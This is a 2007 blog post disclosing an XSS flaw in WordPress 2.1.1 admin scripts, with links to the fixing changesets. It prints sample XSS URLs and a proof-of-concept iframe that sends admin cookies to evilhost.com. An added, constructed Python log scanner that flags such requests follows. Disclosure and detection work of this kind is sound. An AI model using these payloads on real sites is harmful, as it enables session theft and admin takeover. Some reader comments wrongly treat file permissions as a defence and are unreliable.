Zeroday Exploit found for WordPress 2.1.1
Published by Sunny on February 28th, 2007 in WordPress
A vulnerability has been identified in WordPress, which could be exploited by attackers to execute arbitrary scripting code to compromise the admin account.
Here are some examples of arbitrary script execution:
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Here is proof-of-concept code to steal the admin cookies:
<iframe width="0" height="0" src="http://somesite.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27"></iframe>
Solution:
http://trac.wordpress.org/changeset/4951
http://trac.wordpress.org/changeset/4952
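A log check for the requests shown above, as an added example that is not part of the original post or of WordPress: it flags hits on the two admin scripts whose `p`, `c` or `post` value is not a plain integer. That these parameters only ever carry numeric IDs is an inference from the URLs above, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Admin scripts and ID parameters taken from the URLs shown in the post.
# Assumption: a legitimate request only ever carries a decimal ID in them.
ID_PARAMS = {
    "/wp-admin/comment.php": ("p", "c"),
    "/wp-admin/post.php": ("post",),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")

def suspicious_params(log_line):
    """Return [(param, decoded_value)] for ID parameters that are not integers."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    hits = []
    for script, params in ID_PARAMS.items():
        # endswith() also covers blogs installed in a subdirectory.
        if not url.path.endswith(script):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        for name in params:
            for value in query.get(name, []):
                if not INTEGER_RE.fullmatch(value):
                    hits.append((name, value))
    return hits

def scan(lines):
    """Return (line_number, param, value) for every flagged parameter."""
    return [(n, name, value)
            for n, line in enumerate(lines, 1)
            for name, value in suspicious_params(line)]

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Feb/2007:21:40:01 +0000] "GET /wp-admin/comment.php?action=deletecomment&p=35&c=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [28/Feb/2007:21:41:13 +0000] "GET /wp-admin/comment.php?action=deletecomment&p=35&c=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5301',
    '192.0.2.10 - - [28/Feb/2007:21:42:30 +0000] "GET /wp-admin/post.php?action=delete&post=39 HTTP/1.1" 200 4800',
    '192.0.2.10 - - [28/Feb/2007:21:43:02 +0000] "GET /index.php?p=hello HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit means the request should be reviewed; it does not by itself show that the script ran in an administrator's browser.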

February 28th, 2007 at 9:44 pm
Is this only for self-hosted sites? Or does it apply to WordPress-hosted sites also?
March 1st, 2007 at 10:45 am
It sure didn’t work on your blog
March 1st, 2007 at 3:01 pm
and did it work on..say…preshit’s blog?
March 1st, 2007 at 3:17 pm
Nope. Preshit’s blogs are hosted on the same server as my sites. And by default, the permissions seem to disallow unauthorized access to files. We’re safe!
March 1st, 2007 at 4:29 pm
*phew*
March 1st, 2007 at 5:48 pm
I’m safe
March 1st, 2007 at 6:29 pm
Am I safe???? I think so….
http://gotechno.org/
April 13th, 2007 at 12:45 am
hi nice site.